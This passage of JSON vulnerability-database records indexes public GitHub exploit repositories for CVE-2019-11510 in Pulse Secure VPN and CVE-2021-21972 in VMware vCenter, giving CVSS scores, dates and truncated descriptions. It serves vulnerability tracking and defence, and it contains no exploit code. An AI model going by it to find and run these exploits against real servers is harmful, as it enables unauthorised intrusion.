["CVE-2019-11510"], "modified": "2022-07-10T18:18:14", "id": "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-02T21:30:19", "description": "# CVE-2019-11510\nExploit for Arbitrary File Read on Pulse Secure...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-21T08:40:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-08-02T19:52:38", "id": "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:06", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-27T15:06:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-12-13T12:56:51", "id": "059DC199-E425-50EE-B5F5-E351E0323E69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T06:25:19", "description": "SUMMARY\n-------\nSimple NSE script to detect Pulse Secure SSL VPN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-27T03:04:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-12T05:49:07", "id": "765DCAD5-2789-5451-BBFA-FAD691719F7A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T20:06:56", "description": "(CVE-2021-21972) VMware vCenter Server Remote Code Execution Vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T11:57:42", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-27T06:52:45", "id": "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:59", "description": "# westone-CVE-2021-21972-scanner \nVMware vCenter Server remote ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T03:19:25", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-20T07:55:11", "id": "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:59:49", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T18:22:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-08-27T21:28:19", "id": "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:42", "description": "# vcenter_rce\n\u6f0f\u6d1e\u5229\u7528\uff0cVmware vCenter 6.5-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-01T14:14:01", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-28T02:16:46", "id": "D4220876-A611-59AE-8262-07797542DAB9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:53", "description": "# CVE-2021-21972\n\n## Description \nThe vSphere Client (HTML5) co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T05:16:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-06-20T12:51:14", "id": "5711B5D3-F257-5128-8C1A-908EACEAEC29", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:43", "description": "# VMware_vCenter_CVE-2021-21972\nVMware vCenter CVE-2021-21972 Re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-27T10:27:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-14T04:48:32", "id": "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:46", "description": "# Usage:CVE-2021-21972.py [option]\n- -u or --url\uff1a\u76ee\u6807url\n- -t or -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T09:28:17", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-26T01:57:28", "id": "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:49", "description": "# CVE-2021-21972 (checker)\nVMware vCenter Server CVE-2021-21972 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T05:10:06", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-06-20T12:51:14", "id": "50618611-3CA9-5185-8ED3-53532D99D4B7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:51", "description": "# CVE-2021-21972\n\n### \u6f0f\u6d1e\u63cf\u8ff0\n\ncve-2021-21972\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n\u5177\u6709443\u7aef\u53e3\u8bbf\u95ee\u6743\u9650\u7684\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T13:19:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-22T11:25:34", "id": "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:41", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-03T12:09:53", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-03T12:10:03", "id": "64EF6553-4D22-526B-A1CC-09212DBD7625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:24", "description": "# CVE-2021-21972\nCVE-2021-21972 Unauthorized RCE in VMware vCent...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T16:30:36", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-27T13:08:53", "id": "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:15", "description": "# cve-2021-21972\n\n##\u4f7f\u7528\u8bf4\u660e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T03:01:46", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-12-27T05:40:13", "id": "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-21T22:04:24", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T14:00:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-21T20:14:22", "id": "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:57", "description": "# CVE-2021-21972\nCVE-2021-21972\n\nTested against VMware VCSA 6.7\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T13:04:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-07-14T14:37:02", "id": "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-08T02:18:27", "description": "# CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\n### poc Jus...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T09:56:21", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-07T12:56:09", "id": "C98B31E5-B85D-50EE-9596-F00F1B89A800", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:49:58", "description": "# CVE-2021-21972\nProof of Concept Exploit for vCenter CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T16:31:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:25:14", "id": "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:07:51", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 